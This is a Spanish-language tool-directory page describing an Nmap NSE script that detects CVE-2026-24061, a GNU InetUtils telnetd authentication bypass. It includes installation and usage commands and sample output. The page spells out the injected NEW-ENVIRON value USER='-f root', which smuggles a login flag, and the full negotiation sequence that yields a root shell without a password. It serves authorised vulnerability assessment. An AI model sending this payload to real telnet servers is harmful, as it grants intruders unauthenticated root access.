Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061-NSE — El script realiza una negociación Telnet completa replicando la secuencia exacta de bytes de una sesión real de un cliente telnet -a. | Kitploit
Herramientas/GitHubGitHub/hd0x01/cve-2026-24061-nse
Escáneres de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAutenticación
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

El script realiza una negociación Telnet completa replicando la secuencia exacta de bytes de una sesión real de un cliente telnet -a.

Ver Repositorio
7hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061 — Bypass de autenticación en telnetd de GNU InetUtils

Script de detección NSE para Nmap

Nmap NSE CVE CVSSv3 License


Resumen

Este script NSE de Nmap detecta CVE-2026-24061, una vulnerabilidad de bypass de autenticación en telnetd de GNU InetUtils versiones 1.9.3 hasta 2.7.

Al enviar una variable de entorno USER manipulada con la forma durante la negociación de opciones de Telnet, un atacante no autenticado puede obtener un shell con los privilegios del usuario local especificado — incluido — .

-f <nombre_de_usuario>
root
sin proporcionar ninguna contraseña

Uso previsto: Solo pruebas de penetración autorizadas y evaluación de vulnerabilidades.
Ejecutar este script contra sistemas sin permiso escrito explícito es ilegal.


Detalles de la vulnerabilidad

CampoValor
ID de CVECVE-2026-24061
Afecta atelnetd de GNU InetUtils 1.9.3 – 2.7
Puntuación CVSSv39.8 Crítico
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TipoBypass de autenticación (CWE-287)
Divulgación2026-01-01

Cómo funciona

telnetd de GNU InetUtils utiliza la opción Telnet NEW-ENVIRON (RFC 1572) para recibir variables de entorno del cliente durante la fase de negociación. El programa login(1) se invoca posteriormente con esas variables.

La vulnerabilidad surge porque telnetd pasa la variable USER directamente a login sin sanitizarla. El programa login en Linux acepta un indicador -f <usuario> que significa "preautenticado, no comprobar contraseña". Al inyectar USER="-f root" mediante la carga útil NEW-ENVIRON, el atacante omite la autenticación por completo.

root@kitploit:~
Cliente → Servidor:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Respuesta del servidor:  genera login -f root  →  shell root, sin contraseña requerida

Detalles del script

CampoValor
Nombre de archivotelnet-vuln-cve-2026-24061.nse
Categoríasvuln, exploit, intrusive
PuertoTCP/23 (telnet)
Probado enNmap 7.94 / 7.98, Windows y Linux

Método de detección

El script realiza una negociación Telnet completa replicando la secuencia exacta de bytes de una sesión real de cliente telnet -a (reconstruida a partir de una captura de Wireshark):

  1. Recibe la ráfaga IAC inicial del servidor (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. Responde con el anuncio completo de capacidades del cliente (WILL TTYPE, WILL LINEMODE, …)
  3. Completa la ronda de subnegociación (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. Inyecta USER='-f <usuario>' manipulado en la carga útil NEW-ENVIRON IS
  5. Completa la secuencia WILL ECHO / DO BINARY / WONT LINEMODE
    (crítico — sin esto, telnetd no puede finalizar la configuración del PTY)
  6. Comprueba si el servidor envía un prompt de shell de inicio de sesión sin un desafío de contraseña

Estados de resultado:

EstadoSignificado
EXPLOITPrompt de shell recibido — bypass confirmado
LIKELY_VULNCarga útil ENV aceptada, sin prompt de contraseña, pero sin prompt de shell
NOT_VULNPrompt de contraseña visto, o la negociación no se completó

Instalación

Linux

root@kitploit:~
# Copiar al directorio de scripts de Nmap
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Actualizar la base de datos de scripts
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Copiar al directorio de scripts de Nmap (ajustar la ruta si es necesario)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Actualizar la base de datos de scripts (ejecutar como Administrador)
nmap --script-updatedb

Uso

Escaneo básico (usuario predeterminado: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <objetivo>

Especificar un usuario diferente

root@kitploit:~
# Forma corta
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <objetivo>

# Forma media
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <objetivo>

# Forma totalmente calificada
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <objetivo>

Escanear un rango de IP

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

Salida detallada / Depuración

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <objetivo>   # detallado
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <objetivo>   # depuración
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <objetivo>   # traza hex completa

Salida de ejemplo

Host vulnerable

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   Bypass de autenticación en telnetd de GNU InetUtils
|     Estado: VULNERABLE (Explotable)
|     IDs:  CVE:CVE-2026-24061
|     Factor de riesgo: Crítico  CVSSv3: 9.8
|     Descripción:
|       El servicio telnetd en GNU InetUtils (1.9.3 - 2.7) permite
|       el bypass de autenticación mediante una variable de entorno USER manipulada.
|       Enviar '-f <usuario>' resulta en un shell de inicio de sesión no autenticado.
|     Información adicional:
|       Bypass de autenticación: prompt de shell recibido tras inyectar
|       USER='-f root' -- no se presentó ningún desafío de contraseña.
|     Referencias:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

Host no vulnerable

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(sin salida del script — NOT_VULN es silencioso por diseño, convención estándar de Nmap)


Argumentos del script

ArgumentoAlias(es)PredeterminadoDescripción
telnet-vuln-cve-2026-24061.usertelnet-user, userrootNombre de usuario a inyectar mediante -f

Notas técnicas

Por qué WONT LINEMODE es crítico

telnetd de GNU InetUtils utiliza la negociación Linemode (RFC 1184) para determinar el modo de E/S del terminal. El servidor envía DO LINEMODE al inicio de la negociación, y el cliente responde inicialmente con WILL LINEMODE. Después del intercambio de la carga útil ENV, el servidor envía WILL ECHO seguido de DO BINARY. En este punto, el cliente debe responder con WONT LINEMODE para indicar el modo carácter a carácter — solo entonces telnetd puede completar la configuración del PTY (ioctl TIOCSWINSZ) y bifurcar login. Sin este paso, el servidor registra peer died: Inappropriate ioctl for device y cierra la conexión.

API de socket NSE

La API de socket NSE de Nmap difiere de las convenciones estándar de socket de Lua:

root@kitploit:~
-- Nmap NSE (correcto):
local status, data = sock:receive_bytes(1)
if status == true then -- data es la cadena recibida

Referencias

  • NVD — CVE-2026-24061
  • PoC de JayGLXR
  • PoC de SafeBreach-Labs
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Documentación NSE de Nmap

Aviso legal

Este script se proporciona solo para pruebas de seguridad autorizadas y fines de investigación. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Obtenga siempre permiso escrito explícito antes de probar sistemas que no posea.

Descargar herramienta